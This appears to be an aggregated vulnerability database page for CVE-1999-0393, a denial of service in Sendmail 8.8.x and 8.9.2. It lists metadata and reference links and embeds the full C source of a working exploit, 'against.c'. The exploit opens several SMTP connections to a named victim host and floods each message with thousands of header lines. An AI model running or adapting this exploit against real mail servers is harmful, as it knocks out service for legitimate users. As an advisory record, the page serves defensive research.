CVE-1999-0393
CVSS 5.0
Published: 1999-01-01 00:00:00
Last revised: 2016-10-17 21:59:15

[Original] Remote attackers can cause a denial of service in Sendmail 8.8.x and 8.9.2 by sending messages with a large number of headers.


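[CNNVD] Sendmail Denial of Service Vulnerability (CNNVD-199901-003)

        A vulnerability exists in Sendmail 8.8.x and 8.9.2. A remote attacker can cause a denial of service by sending a message with a large number of headers.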

- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:eric_allman:sendmail:8.8
cpe:/a:eric_allman:sendmail:8.9.2

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0393
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0393
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199901-003
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=91694391227372&w=2
(UNKNOWN)  BUGTRAQ  19990121 Sendmail 8.8.x/8.9.x bugware

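- Vulnerability Information

Sendmail Denial of Service Vulnerability
Medium severity  Unknown
1999-01-01 00:00:00 2005-05-02 00:00:00
Remote
        A vulnerability exists in Sendmail 8.8.x and 8.9.2. A remote attacker can cause a denial of service by sending a message with a large number of headers.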

- Advisories and Patches

        

- Vulnerability Information (23167)

Sendmail 8.9.2 Headers Prescan Denial Of Service Vulnerability (EDBID:23167)
irix dos
1998-12-12 Verified
0 marchew
N/A
source: http://www.securityfocus.com/bid/8674/info

Sendmail has been reported prone to a denial of service vulnerability when handling malicious SMTP mail headers. The vulnerability reportedly stems from an inefficient implementation of a header prescan algorithm.

A remote attacker may reportedly deny service to legitimate users by sending specially crafted emails to the affected service.

/*
	      against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
	      (c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>
	
	      Usage: ./against existing_user_on_victim_host victim_host
	      Example: ./against nobody lamers.net
	
	    */
	
	    #include <stdio.h>
	    #include <unistd.h>
	    #include <sys/param.h>
	    #include <sys/socket.h>
	    #include <sys/time.h>
	    #include <netinet/in.h>
	    #include <netdb.h>
	    #include <stdarg.h>
	    #include <errno.h>
	    #include <signal.h>
	    #include <getopt.h>
	    #include <stdlib.h>
	    #include <string.h>
	
	    #define MAXCONN 4
	    #define LINES   15000
	
	    struct hostent *hp;
	    struct sockaddr_in s;
	    int suck,loop,x;
	
	    int main(int argc,char* argv[]) {
	
	      printf("against.c - another Sendmail DoS (up to 8.9.2)\n");
	
	      if (argc-3) {
		printf("Usage: %s victim_user victim_host\n",argv[0]);
		exit(0);
	      }
	
	      hp=gethostbyname(argv[2]);
	
	      if (!hp) {
		perror("gethostbyname");
		exit(1);
	      }
	
	      fprintf(stderr,"Doing mess: ");
	
	      for (;loop<MAXCONN;loop++) if (!(x=fork())) {
		FILE* d;
		bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
		s.sin_family=hp->h_addrtype;
		s.sin_port=htons(25);
		if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
		if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
		if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }
	
		usleep(100000);
	
		fprintf(d,"helo tweety\n");
		fprintf(d,"mail from: tweety@polbox.com\n");
		fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
		fprintf(d,"data\n");
	
		usleep(100000);
	
		for(loop=0;loop<LINES;loop++) {
		  if (!(loop%100)) fprintf(stderr,".");
		  fprintf(d,"To: x\n");
		}
	
		fprintf(d,"\n\n\nsomedata\n\n\n");
	
		fprintf(d,".\n");
	
		sleep(1);
	
		fprintf(d,"quit\n");
		fflush(d);
	
		sleep(100);
		shutdown(suck,2);
		close(suck);
		exit(0);
	      }
	
	      waitpid(x,&loop,0);
	
	      fprintf(stderr,"ok\n");
	
	      return 0;
	    }
		

- Vulnerability Information

9310
Sendmail Header Prescan Function Message Header DoS
Denial of Service
Loss of Availability Upgrade
Exploit Public Vendor Verified

- Vulnerability Description

Unknown or Incomplete

- Timeline

1999-01-20 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete
 

 
